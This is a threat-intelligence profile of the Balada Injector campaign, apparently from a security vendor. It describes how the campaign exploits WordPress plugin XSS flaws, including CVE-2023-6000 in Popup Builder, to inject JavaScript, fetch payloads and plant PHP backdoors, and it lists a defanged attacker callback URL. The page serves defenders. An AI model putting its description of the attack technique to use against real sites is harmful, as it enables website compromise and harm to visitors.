Balada Injector
Balada Injector is malware/campaign activity associated with mass compromise of WordPress websites. The provided content states it has been detected on more than 1,170 sites by Sucuri SiteCheck, and another source cited in the content notes exploitation of the WordPress Popup Builder plugin vulnerability CVE-2023-6000 to infect more than 3,300 websites. The campaign is described as targeting WordPress sites through cross-site scripting (XSS) vulnerabilities, including a known XSS flaw in the Popup Builder plugin. In the cited November 2024 case, attackers injected JavaScript by manipulating a custom event during pop-up triggers; the injected script used the callback URL https://call[.]colorschemeas[.]com/2YYHm4, downloaded additional payloads, and ultimately installed a PHP-based backdoor. The content also references Darktrace detection of Balada Injector malware exploiting WordPress vulnerabilities to gain unauthorized network access. High-confidence indicators mentioned in the content include the callback URL call[.]colorschemeas[.]com/2YYHm4. Targeting described in the content includes WordPress-hosted websites, with one cited victim being a local government council website.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Sucuri 的 SiteCheck 远程恶意软件扫描程序 已在 1,170 多个站点上检测到 Balada Injector 恶意软件。 | WordPress网站遭到黑客攻击,利用Popup Builder插件旧版本的漏洞,感染了超过3,300个网站。攻击利用的漏洞被跟踪为CVE-2023-6000,是一个跨站脚本(XSS)漏洞,影响Popup Builder 4.2.3及更旧版本。攻击通过在WordPress管理界面的自定义JavaScript或自定义CSS部分进行感染,并将恶意代码存储在'wp_postmeta'数据库表中。恶意代码的主要功能是作为Popup Builder插件事件的事件处理程序,例如'sgpb-ShouldOpen'、'sgpb-ShouldClose'等。这些攻击的主要目的似乎是将感染网站的访问者重定向到恶意目的地,如钓鱼页面和恶意软件下载站点。
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A web-injection campaign targeting WordPress sites (via XSS in plugins) to inject obfuscated JavaScript that calls out to attacker infrastructure to fetch additional payloads and ultimately install a PHP-based backdoor for persistent access.
Malware referred to as exploiting WordPress vulnerabilities to gain unauthorized access (initial access) into networks.
Balada Injector is a malware family that injects malicious code into WordPress sites, often via plugin vulnerabilities, to redirect visitors to phishing or malware sites.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.